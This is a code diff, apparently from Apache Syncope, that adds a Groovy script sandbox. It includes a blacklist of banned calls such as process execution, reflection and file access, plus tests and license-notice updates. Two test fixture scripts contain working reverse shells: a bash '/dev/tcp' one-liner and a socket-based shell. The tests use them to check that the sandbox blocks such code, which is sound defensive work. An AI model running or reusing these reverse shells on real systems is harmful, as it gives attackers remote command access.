     private static final Map<String, Class<?>> CLASS_CACHE = Collections.synchronizedMap(new HashMap<>());
 
+    static {
+        CompilerConfiguration cc = new CompilerConfiguration();
+        cc.addCompilationCustomizers(new RejectASTTransformsCustomizer(), new SandboxTransformer());
+        cc.setDisabledGlobalASTTransformations(Set.of(GrabAnnotationTransformation.class.getName()));
+
+        GROOVY_CLASSLOADER = new GroovyClassLoader(Thread.currentThread().getContextClassLoader(), cc);
+    }
+
     @SuppressWarnings("unchecked")
     public static Optional<ReportJobDelegate> buildReportJobDelegate(
             final Implementation impl,
@@ -75,7 +91,7 @@ public static Optional<ReportJobDelegate> buildReportJobDelegate(
                     return Optional.empty();
                 }
 
-                ReportJobDelegate report = build(clazz, true, cacheGetter, cachePutter);
+                ReportJobDelegate report = build(clazz, true, impl.getEngine(), cacheGetter, cachePutter);
                 report.setConf(conf);
                 return Optional.of(report);
         }
@@ -102,7 +118,7 @@ public static Optional<AccountRule> buildAccountRule(
                     return Optional.empty();
                 }
 
-                AccountRule rule = build(clazz, true, cacheGetter, cachePutter);
+                AccountRule rule = build(clazz, true, impl.getEngine(), cacheGetter, cachePutter);
                 rule.setConf(conf);
                 return Optional.of(rule);
         }
@@ -129,7 +145,7 @@ public static Optional<PasswordRule> buildPasswordRule(
                     return Optional.empty();
                 }
 
-                PasswordRule rule = build(clazz, true, cacheGetter, cachePutter);
+                PasswordRule rule = build(clazz, true, impl.getEngine(), cacheGetter, cachePutter);
                 rule.setConf(conf);
                 return Optional.of(rule);
         }
@@ -157,7 +173,7 @@ public static Optional<InboundCorrelationRule> buildInboundCorrelationRule(
                     return Optional.empty();
                 }
 
-                InboundCorrelationRule rule = build(clazz, true, cacheGetter, cachePutter);
+                InboundCorrelationRule rule = build(clazz, true, impl.getEngine(), cacheGetter, cachePutter);
                 rule.setConf(conf);
                 return Optional.of(rule);
         }
@@ -185,7 +201,7 @@ public static Optional<PushCorrelationRule> buildPushCorrelationRule(
                     return Optional.empty();
                 }
 
-                PushCorrelationRule rule = build(clazz, true, cacheGetter, cachePutter);
+                PushCorrelationRule rule = build(clazz, true, impl.getEngine(), cacheGetter, cachePutter);
                 rule.setConf(conf);
                 return Optional.of(rule);
         }
@@ -251,15 +267,27 @@ private static <T> Pair<Class<T>, Boolean> getClass(final Implementation impl) t
         return Pair.of((Class<T>) clazz, false);
     }
 
+    private static <T> T createBean(final Class<T> clazz, final ImplementationEngine engine) {
+        T bean = ApplicationContextProvider.getBeanFactory().createBean(clazz);
+        if (engine == ImplementationEngine.GROOVY) {
+            AspectJProxyFactory factory = new AspectJProxyFactory(bean);
+            factory.addAspect(new GroovySandbox(
+                    ApplicationContextProvider.getApplicationContext().getBean(Blacklist.class)));
+            bean = factory.getProxy();
+        }
+        return bean;
+    }
+
     @SuppressWarnings("unchecked")
     public static <T> T build(final Implementation impl) throws ClassNotFoundException {
-        return (T) ApplicationContextProvider.getBeanFactory().createBean(getClass(impl).getLeft());
+        return createBean((Class<T>) getClass(impl).getLeft(), impl.getEngine());
     }
 
     @SuppressWarnings("unchecked")
     private static <T> T build(
             final Class<T> clazz,
             final boolean classCached,
+            final ImplementationEngine engine,
             final Supplier<T> cacheGetter,
             final Consumer<T> cachePutter) {
 
@@ -271,7 +299,7 @@ private static <T> T build(
             instance = cacheGetter.get();
         }
         if (instance == null) {
-            instance = ApplicationContextProvider.getBeanFactory().createBean(clazz);
+            instance = createBean(clazz, engine);
 
             if (perContext) {
                 cachePutter.accept(instance);
@@ -286,7 +314,7 @@ public static <T> T build(final Implementation impl, final Supplier<T> cacheGett
 
         Pair<Class<T>, Boolean> clazz = getClass(impl);
 
-        return build(clazz.getLeft(), clazz.getRight(), cacheGetter, cachePutter);
+        return build(clazz.getLeft(), clazz.getRight(), impl.getEngine(), cacheGetter, cachePutter);
     }
 
     public static Class<?> purge(final String implementation) {

@@ -21,6 +21,10 @@
 import com.nimbusds.jose.JOSEException;
 import com.nimbusds.jose.JWSAlgorithm;
 import com.nimbusds.jose.KeyLengthException;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.Reader;
 import java.security.NoSuchAlgorithmException;
 import java.security.spec.InvalidKeySpecException;
 import org.apache.syncope.common.lib.types.CipherAlgorithm;
@@ -33,17 +37,21 @@
 import org.apache.syncope.core.spring.policy.DefaultRuleProvider;
 import org.apache.syncope.core.spring.security.jws.AccessTokenJWSSigner;
 import org.apache.syncope.core.spring.security.jws.AccessTokenJWSVerifier;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.blacklists.Blacklist;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.beans.factory.config.BeanDefinition;
 import org.springframework.boot.autoconfigure.condition.ConditionalOnMissingBean;
 import org.springframework.boot.context.properties.EnableConfigurationProperties;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
+import org.springframework.context.annotation.EnableAspectJAutoProxy;
 import org.springframework.context.annotation.Role;
+import org.springframework.core.io.ResourceLoader;
 import org.springframework.security.config.core.GrantedAuthorityDefaults;
 
 @EnableConfigurationProperties(SecurityProperties.class)
+@EnableAspectJAutoProxy(proxyTargetClass = false)
 @Configuration(proxyBeanMethods = false)
 public class SecurityContext {
 
@@ -153,4 +161,16 @@ public ApplicationContextProvider applicationContextProvider() {
     public EncryptorManager encryptorManager() {
         return new DefaultEncryptorManager();
     }
+
+    @ConditionalOnMissingBean
+    @Bean
+    public Blacklist groovyBlackList(final ResourceLoader resourceLoader, final SecurityProperties props)
+            throws IOException {
+
+        try (InputStream in = resourceLoader.getResource(props.getGroovyBlacklist()).getInputStream();
+                Reader reader = new InputStreamReader(in)) {
+
+            return new Blacklist(reader);
+        }
+    }
 }

@@ -100,6 +100,8 @@ public void setUseLenientSaltSizeCheck(final boolean useLenientSaltSizeCheck) {
 
     private String secretKey;
 
+    private String groovyBlacklist = "classpath:META-INF/groovy.blacklist";
+
     private final DigesterProperties digester = new DigesterProperties();
 
     public String getAdminUser() {
@@ -174,6 +176,14 @@ public void setSecretKey(final String secretKey) {
         this.secretKey = secretKey;
     }
 
+    public String getGroovyBlacklist() {
+        return groovyBlacklist;
+    }
+
+    public void setGroovyBlacklist(final String groovyBlacklist) {
+        this.groovyBlacklist = groovyBlacklist;
+    }
+
     public DigesterProperties getDigester() {
         return digester;
     }

@@ -0,0 +1,112 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+# Reflective access to Groovy
+method groovy.lang.GroovyObject getMetaClass
+method groovy.lang.GroovyObject getProperty java.lang.String
+method groovy.lang.GroovyObject invokeMethod java.lang.String java.lang.Object
+method groovy.lang.GroovyObject setMetaClass groovy.lang.MetaClass
+method groovy.lang.GroovyObject setProperty java.lang.String java.lang.Object
+
+# Raw file operations
+staticMethod java.io.File createTempFile java.lang.String java.lang.String
+staticMethod java.io.File createTempFile java.lang.String java.lang.String java.io.File
+new java.io.File java.lang.String
+new java.io.File java.lang.String java.lang.String
+new java.io.File java.net.URI
+staticMethod java.io.File listRoots
+new java.io.FileInputStream java.lang.String
+new java.io.FileOutputStream java.lang.String
+new java.io.FileOutputStream java.lang.String boolean
+new java.io.FileReader java.lang.String
+new java.io.FileWriter java.lang.String
+new java.io.FileWriter java.lang.String boolean
+new java.io.PrintStream java.lang.String
+new java.io.PrintStream java.lang.String java.lang.String
+new java.io.PrintWriter java.lang.String
+new java.io.PrintWriter java.lang.String java.lang.String
+new java.io.RandomAccessFile java.lang.String java.lang.String
+
+# No reflection!
+method java.lang.Class getConstructor java.lang.Class[]
+method java.lang.Class getConstructors
+method java.lang.Class getDeclaredConstructor java.lang.Class[]
+method java.lang.Class getDeclaredConstructors
+method java.lang.Class getDeclaredField java.lang.String
+method java.lang.Class getDeclaredFields
+method java.lang.Class getDeclaredMethod java.lang.String java.lang.Class[]
+method java.lang.Class getDeclaredMethods
+method java.lang.Class getField java.lang.String
+method java.lang.Class getFields
+method java.lang.Class getMethod java.lang.String java.lang.Class[]
+method java.lang.Class getMethods
+method java.lang.Class getResource java.lang.String
+method java.lang.Class getResourceAsStream java.lang.String
+method java.lang.Class newInstance
+
+# Same for local process execution.
+new java.lang.ProcessBuilder java.lang.String[]
+new java.lang.ProcessBuilder java.util.List
+method java.lang.Process start
+staticMethod java.lang.Runtime getRuntime
+staticMethod java.lang.System exit int
+
+# Leak information.
+staticMethod java.lang.System getProperties
+staticMethod java.lang.System getProperty java.lang.String
+staticMethod java.lang.System getProperty java.lang.String java.lang.String
+staticMethod java.lang.System getenv
+staticMethod java.lang.System getenv java.lang.String
+staticMethod java.lang.System nanoTime
+staticMethod java.lang.System setProperty java.lang.String java.lang.String
+
+# Could be used to read local files.
+method java.net.URL getContent
+method java.net.URL getContent java.lang.Class[]
+method java.net.URL openConnection
+method java.net.URL openStream
+
+# NIO file operations must start with a Path:
+staticMethod java.nio.file.Paths get java.lang.String java.lang.String[]
+staticMethod java.nio.file.Paths get java.net.URI
+
+# More process execution, Groovy-style:
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String java.lang.String[] java.io.File
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String java.util.List java.io.File
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String[]
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String[] java.lang.String[] java.io.File
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String[] java.util.List java.io.File
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.util.List
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.util.List java.lang.String[] java.io.File
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.util.List java.util.List java.io.File
+
+# JSON
+staticMethod groovy.json.JsonOutput toJson groovy.lang.Closure
+staticMethod groovy.json.JsonOutput toJson java.lang.Object
+
+# SECURITY-538
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods getAt java.lang.Object java.lang.String
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods getMetaPropertyValues java.lang.Object
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods getProperties java.lang.Object
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods putAt java.lang.Object java.lang.String java.lang.Object
+staticMethod org.codehaus.groovy.runtime.ScriptBytecodeAdapter asType java.lang.Object java.lang.Class
+staticMethod org.codehaus.groovy.runtime.ScriptBytecodeAdapter castToType java.lang.Object java.lang.Class
+
+# SECURITY-1754
+new org.kohsuke.groovy.sandbox.impl.Checker$SuperConstructorWrapper java.lang.Object[]
+new org.kohsuke.groovy.sandbox.impl.Checker$ThisConstructorWrapper java.lang.Object[]

@@ -0,0 +1,69 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one
+ * or more contributor license agreements.  See the NOTICE file
+ * distributed with this work for additional information
+ * regarding copyright ownership.  The ASF licenses this file
+ * to you under the Apache License, Version 2.0 (the
+ * "License"); you may not use this file except in compliance
+ * with the License.  You may obtain a copy of the License at
+ *
+ *   http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing,
+ * software distributed under the License is distributed on an
+ * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ * KIND, either express or implied.  See the License for the
+ * specific language governing permissions and limitations
+ * under the License.
+ */
+package org.apache.syncope.core.spring.implementation;
+
+import static org.junit.jupiter.api.Assertions.assertThrows;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.when;
+
+import org.apache.cxf.helpers.IOUtils;
+import org.apache.syncope.common.lib.types.ImplementationEngine;
+import org.apache.syncope.core.persistence.api.entity.Implementation;
+import org.apache.syncope.core.provisioning.api.macro.MacroActions;
+import org.apache.syncope.core.spring.SpringTestConfiguration;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.api.condition.EnabledOnOs;
+import org.junit.jupiter.api.condition.OS;
+import org.springframework.test.context.junit.jupiter.SpringJUnitConfig;
+
+@SpringJUnitConfig(classes = { SpringTestConfiguration.class })
+class GroovySandboxTest {
+
+    @Test
+    void processBuilder() throws Exception {
+        Implementation impl = mock(Implementation.class);
+        when(impl.getKey()).thenReturn("processBuilder");
+        when(impl.getEngine()).thenReturn(ImplementationEngine.GROOVY);
+        when(impl.getBody()).thenReturn(IOUtils.toString(
+                getClass().getResourceAsStream("/ProcessBuilderMacroActions.groovy")));
+
+        MacroActions actions = ImplementationManager.build(impl);
+
+        SecurityException e = assertThrows(
+                SecurityException.class, () -> actions.afterAll(null, new StringBuilder()));
+        assertTrue(e.getMessage().contains("Insecure call to 'new java.lang.ProcessBuilder java.lang.String[]'"));
+    }
+
+    @EnabledOnOs(OS.LINUX)
+    @Test
+    void bash() throws Exception {
+        Implementation impl = mock(Implementation.class);
+        when(impl.getKey()).thenReturn("bash");
+        when(impl.getEngine()).thenReturn(ImplementationEngine.GROOVY);
+        when(impl.getBody()).thenReturn(IOUtils.toString(
+                getClass().getResourceAsStream("/BashMacroActions.groovy")));
+
+        MacroActions actions = ImplementationManager.build(impl);
+
+        SecurityException e = assertThrows(
+                SecurityException.class, () -> actions.afterAll(null, new StringBuilder()));
+        assertTrue(e.getMessage().contains("Insecure call to 'new java.io.File java.lang.String'"));
+    }
+}

@@ -36,7 +36,7 @@
 import org.springframework.test.context.junit.jupiter.SpringJUnitConfig;
 
 @SpringJUnitConfig(classes = { SpringTestConfiguration.class })
-public class ImplementationManagerTest {
+public class PasswordRuleTest {
 
     public static DefaultPasswordRuleConf createBaseDefaultPasswordRuleConf() {
         DefaultPasswordRuleConf baseDefaultPasswordRuleConf = new DefaultPasswordRuleConf();

@@ -25,7 +25,7 @@
 import org.apache.syncope.common.lib.policy.DefaultPasswordRuleConf;
 import org.apache.syncope.core.provisioning.api.serialization.POJOHelper;
 import org.apache.syncope.core.spring.SpringTestConfiguration;
-import org.apache.syncope.core.spring.implementation.ImplementationManagerTest;
+import org.apache.syncope.core.spring.implementation.PasswordRuleTest;
 import org.junit.jupiter.api.Test;
 import org.springframework.test.context.junit.jupiter.SpringJUnitConfig;
 
@@ -36,7 +36,7 @@ public class PasswordGeneratorTest {
 
     @Test
     public void digit() {
-        DefaultPasswordRuleConf pwdRuleConf = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf.setDigit(1);
         TestImplementation passwordRule = new TestImplementation();
         passwordRule.setBody(POJOHelper.serialize(pwdRuleConf));
@@ -48,7 +48,7 @@ public void digit() {
 
     @Test
     public void alphabetical() {
-        DefaultPasswordRuleConf pwdRuleConf = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf.setAlphabetical(1);
         TestImplementation passwordRule = new TestImplementation();
         passwordRule.setBody(POJOHelper.serialize(pwdRuleConf));
@@ -60,7 +60,7 @@ public void alphabetical() {
 
     @Test
     public void lowercase() {
-        DefaultPasswordRuleConf pwdRuleConf = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf.setLowercase(1);
         TestImplementation passwordRule = new TestImplementation();
         passwordRule.setBody(POJOHelper.serialize(pwdRuleConf));
@@ -72,7 +72,7 @@ public void lowercase() {
 
     @Test
     public void uppercase() {
-        DefaultPasswordRuleConf pwdRuleConf = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf.setUppercase(1);
         TestImplementation passwordRule = new TestImplementation();
         passwordRule.setBody(POJOHelper.serialize(pwdRuleConf));
@@ -84,7 +84,7 @@ public void uppercase() {
 
     @Test
     public void special() {
-        DefaultPasswordRuleConf pwdRuleConf = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf.setSpecial(1);
         pwdRuleConf.getSpecialChars().add('@');
         pwdRuleConf.getSpecialChars().add('!');
@@ -102,7 +102,7 @@ public void issueSYNCOPE678() {
         String password = passwordGenerator.generate(List.of());
         assertNotNull(password);
 
-        DefaultPasswordRuleConf pwdRuleConf1 = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf1 = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf1.setMinLength(0);
         TestImplementation passwordRule = new TestImplementation();
         passwordRule.setBody(POJOHelper.serialize(pwdRuleConf1));

@@ -18,15 +18,22 @@
  */
 package org.apache.syncope.core.spring;
 
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.Reader;
 import org.apache.syncope.core.persistence.api.ApplicationContextProvider;
 import org.apache.syncope.core.persistence.api.EncryptorManager;
 import org.apache.syncope.core.provisioning.api.ImplementationLookup;
 import org.apache.syncope.core.spring.security.DefaultEncryptorManager;
 import org.apache.syncope.core.spring.security.DummyImplementationLookup;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.blacklists.Blacklist;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
+import org.springframework.context.annotation.EnableAspectJAutoProxy;
 import org.springframework.context.annotation.Primary;
 
+@EnableAspectJAutoProxy(proxyTargetClass = false)
 @Configuration(proxyBeanMethods = false)
 public class SpringTestConfiguration {
 
@@ -45,4 +52,13 @@ public EncryptorManager encryptorManager() {
     public ImplementationLookup implementationLookup() {
         return new DummyImplementationLookup();
     }
+
+    @Bean
+    public Blacklist groovyBlackList() throws IOException {
+        try (InputStream is = getClass().getResourceAsStream("/META-INF/groovy.blacklist");
+                Reader reader = new InputStreamReader(is);) {
+
+            return new Blacklist(reader);
+        }
+    }
 }

@@ -0,0 +1,48 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one
+ * or more contributor license agreements.  See the NOTICE file
+ * distributed with this work for additional information
+ * regarding copyright ownership.  The ASF licenses this file
+ * to you under the Apache License, Version 2.0 (the
+ * "License"); you may not use this file except in compliance
+ * with the License.  You may obtain a copy of the License at
+ *
+ *   http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing,
+ * software distributed under the License is distributed on an
+ * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ * KIND, either express or implied.  See the License for the
+ * specific language governing permissions and limitations
+ * under the License.
+ */
+import groovy.transform.BaseScript
+import org.apache.syncope.core.provisioning.api.macro.MacroActions
+import java.io.Serializable
+
+abstract class BashMacroActions extends Script implements MacroActions {}
+@BaseScript BashMacroActions _
+
+@Override
+StringBuilder afterAll(Map<String, Serializable> ctx, StringBuilder output) {
+  def f = new File('/tmp/hello.sh')
+  f.withWriter { w ->
+    w.println('#!/bin/bash')
+    w.println('bash -i >& /dev/tcp/localhost/4444 0>&1')
+  }
+  f.setExecutable(true)
+
+  def p  = ['/bin/bash','-lc','/tmp/hello.sh'].execute()
+  def so = new StringWriter()
+  def se = new StringWriter()
+  p.consumeProcessOutput(so, se)
+  p.waitFor()
+
+  output
+  .append('\n[macro] wrote /tmp/hello.sh and executed it.\n[stdout]\n')
+  .append(so.toString()).append('\n')
+  if (se.toString()) {
+    output.append('[stderr]\n').append(se.toString()).append('\n')
+  }
+  return output
+}

@@ -0,0 +1,77 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one
+ * or more contributor license agreements.  See the NOTICE file
+ * distributed with this work for additional information
+ * regarding copyright ownership.  The ASF licenses this file
+ * to you under the Apache License, Version 2.0 (the
+ * "License"); you may not use this file except in compliance
+ * with the License.  You may obtain a copy of the License at
+ *
+ *   http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing,
+ * software distributed under the License is distributed on an
+ * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ * KIND, either express or implied.  See the License for the
+ * specific language governing permissions and limitations
+ * under the License.
+ */
+import groovy.transform.BaseScript
+import org.apache.syncope.core.provisioning.api.macro.MacroActions
+import java.io.Serializable
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+abstract class ProcessBuilderMacroActions extends Script implements MacroActions {}
+@BaseScript ProcessBuilderMacroActions _
+
+@Override
+StringBuilder afterAll(Map<String, Serializable> ctx, StringBuilder output) {
+  String host = "localhost";
+  int port = 4444;
+  String cmd = "bash";
+
+  Process p = new ProcessBuilder(cmd)
+  .redirectErrorStream(true)
+  .start();
+
+  Socket s = new Socket(host, port);
+
+  InputStream pi = p.getInputStream();
+  InputStream pe = p.getErrorStream();
+  InputStream si = s.getInputStream();
+
+  OutputStream po = p.getOutputStream();
+  OutputStream so = s.getOutputStream();
+
+  while (!s.isClosed()) {
+    while (pi.available() > 0) {
+      so.write(pi.read());
+    }
+    while (pe.available() > 0) {
+      so.write(pe.read());
+    }
+    while (si.available() > 0) {
+      po.write(si.read());
+    }
+
+    so.flush();
+    po.flush();
+
+    Thread.sleep(1);
+
+    try {
+      p.exitValue();
+      break;
+    } catch (Exception e) {
+      // ignored
+    }
+  }
+  ;
+  p.destroy();
+  s.close();
+
+  output.append('\nShell started...\n')
+  return output
+}

@@ -0,0 +1,22 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+# See http://www.slf4j.org/api/org/slf4j/impl/SimpleLogger.html
+# Possible values: "trace", "debug", "info", "warn", or "error"
+org.slf4j.simpleLogger.showDateTime=true
+org.slf4j.simpleLogger.dateTimeFormat=YYYY-mm-dd HH:mm:ss.SSS
+org.slf4j.simpleLogger.defaultLogLevel=debug

@@ -272,6 +272,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For FindBugs-jsr305 (http://findbugs.sourceforge.net/):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Error Prone (https://errorprone.info/):
 This is licensed under the AL 2.0, see above.
 

@@ -228,6 +228,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For FindBugs-jsr305 (http://findbugs.sourceforge.net/):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Error Prone (https://errorprone.info/):
 This is licensed under the AL 2.0, see above.
 
@@ -1017,6 +1022,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For Groovy Security Sandbox (https://github.com/Tirasa/groovy-security-sandbox):
+This is licensed under the MIT license, see above.
+
+==
+
 For ANTLR (https://www.antlr.org/):
 This is licensed under the BSD license:
 
@@ -1072,6 +1082,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For groovy-sandbox (https://github.com/craftercms/groovy-sandbox):
+This is licensed under the MIT license, see above.
+
+==
+
 For Cryptacular (https://github.com/vt-middleware/cryptacular):
 This is licensed under the AL 2.0, see above.
 
@@ -1297,11 +1312,6 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
-For Postgresql JDBC Driver (http://jdbc.postgresql.org/):
-This is licensed under the BSD license, see above.
-
-==
-
 For Simple Logging Facade for Java - SLF4J (http://www.slf4j.org/):
 This is licensed under the MIT license, see above.
 

@@ -163,6 +163,12 @@ Copyright 2017 Flowable
 
 ==
 
+This product includes software developed by Groovy Security Sandbox
+Copyright (c) 2012-2020 Kohsuke Kawaguchi, CloudBees, Inc., other contributors
+Copyright (c) 2025 Tirasa
+
+==
+
 This product includes software developed by the ANTLR project.
 Copyright (c) 2012 Terence Parr and Sam Harwell. All rights reserved.
 
@@ -191,6 +197,11 @@ This product includes software developed by the Woodstox Project.
 
 ==
 
+This product includes software developed by groovy-sandbox
+Copyright (c) 2012-2020 Kohsuke Kawaguchi, CloudBees, Inc., other contributors
+
+==
+
 This product includes software developed by the Eclipse Angus Project.
 Copyright (c) 1997, 2024 Oracle and/or its affiliates. All rights reserved.
 
@@ -259,12 +270,6 @@ Copyright (C) 2003-2022 Virginia Tech. All rights reserved.
 
 ==
 
-This product includes software developed by Postgresql JDBC Driver.
-Copyright (c) 1997, PostgreSQL Global Development Group
-All rights reserved.
-
-==
-
 This products includes software developed by the Simple Logging Facade for Java (SLF4J) project.
 Copyright (c) 2004-2016 QOS.ch.
 

@@ -257,6 +257,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For FindBugs-jsr305 (http://findbugs.sourceforge.net/):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Error Prone (https://errorprone.info/):
 This is licensed under the AL 2.0, see above.
 

@@ -203,7 +203,7 @@
 
 ==
 
-For balanced-match (https://github.com/juliangruber/balanced-match):
+For Animate.css (http://daneden.github.io/animate.css/):
 This is licensed under the MIT license:
 
  Permission is hereby granted, free  of charge, to any person obtaining
@@ -227,6 +227,11 @@ This is licensed under the MIT license:
 
 ==
 
+For balanced-match (https://github.com/juliangruber/balanced-match):
+This is licensed under the MIT license, see above.
+
+==
+
 For base64-js (https://github.com/beatgammit/base64-js):
 This is licensed under the MIT license, see above.
 
@@ -482,6 +487,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For FindBugs-jsr305 (http://findbugs.sourceforge.net/):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Gson (https://github.com/google/gson):
 This is licensed under the AL 2.0, see above.
 
@@ -502,6 +512,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For Protocol Buffers (https://developers.google.com/protocol-buffers/):
+This is licensed under the BSD license, see above.
+
+==
+
 For ZXing (https://github.com/zxing/zxing):
 This is licensed under the AL 2.0, see above.
 
@@ -522,217 +537,13 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
-For mchange-commons-java (https://github.com/swaldman/mchange-commons-java):
-This is licensed under the EPL 1.0:
-
-Eclipse Public License - v 1.0
-
-THE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE PUBLIC
-LICENSE ("AGREEMENT"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM
-CONSTITUTES RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT.
-
-1. DEFINITIONS
-
-"Contribution" means:
-
-a) in the case of the initial Contributor, the initial code and documentation
-   distributed under this Agreement, and
-b) in the case of each subsequent Contributor:
-    i) changes to the Program, and
-   ii) additions to the Program;
-
-   where such changes and/or additions to the Program originate from and are
-   distributed by that particular Contributor. A Contribution 'originates'
-   from a Contributor if it was added to the Program by such Contributor
-   itself or anyone acting on such Contributor's behalf. Contributions do not
-   include additions to the Program which: (i) are separate modules of
-   software distributed in conjunction with the Program under their own
-   license agreement, and (ii) are not derivative works of the Program.
-
-"Contributor" means any person or entity that distributes the Program.
-
-"Licensed Patents" mean patent claims licensable by a Contributor which are
-necessarily infringed by the use or sale of its Contribution alone or when
-combined with the Program.
-
-"Program" means the Contributions distributed in accordance with this
-Agreement.
-
-"Recipient" means anyone who receives the Program under this Agreement,
-including all Contributors.
-
-2. GRANT OF RIGHTS
-  a) Subject to the terms of this Agreement, each Contributor hereby grants
-     Recipient a non-exclusive, worldwide, royalty-free copyright license to
-     reproduce, prepare derivative works of, publicly display, publicly
-     perform, distribute and sublicense the Contribution of such Contributor,
-     if any, and such derivative works, in source code and object code form.
-  b) Subject to the terms of this Agreement, each Contributor hereby grants
-     Recipient a non-exclusive, worldwide, royalty-free patent license under
-     Licensed Patents to make, use, sell, offer to sell, import and otherwise
-     transfer the Contribution of such Contributor, if any, in source code and
-     object code form. This patent license shall apply to the combination of
-     the Contribution and the Program if, at the time the Contribution is
-     added by the Contributor, such addition of the Contribution causes such
-     combination to be covered by the Licensed Patents. The patent license
-     shall not apply to any other combinations which include the Contribution.
-     No hardware per se is licensed hereunder.
-  c) Recipient understands that although each Contributor grants the licenses
-     to its Contributions set forth herein, no assurances are provided by any
-     Contributor that the Program does not infringe the patent or other
-     intellectual property rights of any other entity. Each Contributor
-     disclaims any liability to Recipient for claims brought by any other
-     entity based on infringement of intellectual property rights or
-     otherwise. As a condition to exercising the rights and licenses granted
-     hereunder, each Recipient hereby assumes sole responsibility to secure
-     any other intellectual property rights needed, if any. For example, if a
-     third party patent license is required to allow Recipient to distribute
-     the Program, it is Recipient's responsibility to acquire that license
-     before distributing the Program.
-  d) Each Contributor represents that to its knowledge it has sufficient
-     copyright rights in its Contribution, if any, to grant the copyright
-     license set forth in this Agreement.
-
